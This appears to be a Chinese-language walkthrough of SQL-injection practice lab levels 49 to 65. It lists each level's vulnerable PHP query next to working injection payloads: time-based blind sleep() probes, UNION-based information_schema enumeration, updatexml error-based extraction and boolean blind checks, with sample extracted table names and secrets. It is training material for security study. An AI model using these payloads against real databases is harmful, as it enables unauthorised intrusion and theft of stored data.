sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
四十九 错误不回显 时间盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十 时间盲注 堆叠注入(参考上面)
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
五十一 时间盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十二 时间盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23
五十三 时间盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23
五十四 （challenges 库：表名、secret_XXXX 列名及其值均为每个实例随机生成，下文 // 后的结果只是本次示例，需自行重新枚举）
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//sj7vpktxiq
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='sj7vpktxiq'%23
//id,sessid,secret_TXLH,tryy
1' and 1=2 union select 1,group_concat(sessid),3 from challenges.sj7vpktxiq%23
//d1c38a09acc34845c6be3a127a5aacaf
1' and 1=2 union select 1,group_concat(secret_TXLH),3 from challenges.sj7vpktxiq%23
//DwhfpvM0dzKLEqw9hi3PeJzY
五十五
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1) and 1=2 union select 1,database(),3%23
1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//xwflfwldpp
1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='xwflfwldpp'%23
//id,sessid,secret_DMUI,tryy
1)and 1=2 union select 1,group_concat(secret_DMUI),3 from challenges.xwflfwldpp%23
//YBNwglaRUDwbJ1Ze082Ju1Sn
五十六
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//z4d4ffn83s
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='z4d4ffn83s'%23
//id,sessid,secret_Y8GA,tryy
1') and 1=2 union select 1,group_concat(secret_Y8GA),3 from challenges.z4d4ffn83s%23
//PsQNyhePjSzrPUvoEdQruEx6
五十七
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//4i3eu5w9m5
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='4i3eu5w9m5'%23
//id,sessid,secret_YZ8G,tryy
1" and 1=2 union select 1,group_concat(secret_YZ8G),3 from challenges.4i3eu5w9m5%23
//kExPbOrEz78G0bfUGYmNpEJs
五十八
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and updatexml(1,concat(0x23,database()),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//5z3vsai61i
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5z3vsai61i')),1)%23
//id,sessid,secret_C8ER,tryy
1' and updatexml(1,concat(0x23,(select group_concat(secret_C8ER)from challenges.5z3vsai61i)),1)%23
//hmgTXQczwr2neRRzr1m9JvWO
五十九
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1 and updatexml(1,concat(0x23,database()),1)%23
1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//h6hi5xoec7
1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='h6hi5xoec7')),1)%23
//id,sessid,secret_AI69,tryy
1 and updatexml(1,concat(0x23,(select group_concat(secret_AI69)from challenges.h6hi5xoec7)),1)%23
//0g7eQdUtHCmXtr4o8ZySKoYg
六十
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1") and updatexml(1,concat(0x23,database()),1)%23
1") and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//uw2q08bttr
1") and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uw2q08bttr')),1)%23
//id,sessid,secret_BUFB,tryy
1") and updatexml(1,concat(0x23,(select group_concat(secret_BUFB)from challenges.uw2q08bttr)),1)%23
//yJSBxWNO7xmCvhsQNNOQu2Y2
六十一
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
1')) and updatexml(1,concat(0x23,database()),1)%23
1')) and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//avy2e9297x
1')) and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='avy2e9297x')),1)%23
//id,sessid,secret_NSKU,tryy
1')) and updatexml(1,concat(0x23,(select group_concat(secret_NSKU)from challenges.avy2e9297x)),1)%23
//8EhMs3hgKrmAcsmlJn4wVrSh
六十二 盲注
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and length(database())=10 %23
challenges
1') and ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1))<101%23
六十三 盲注
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and length(database())=10 %23
六十四 盲注
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
1)) and length(database())=10 %23
六十五 盲注
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1") and length(database())=10 %23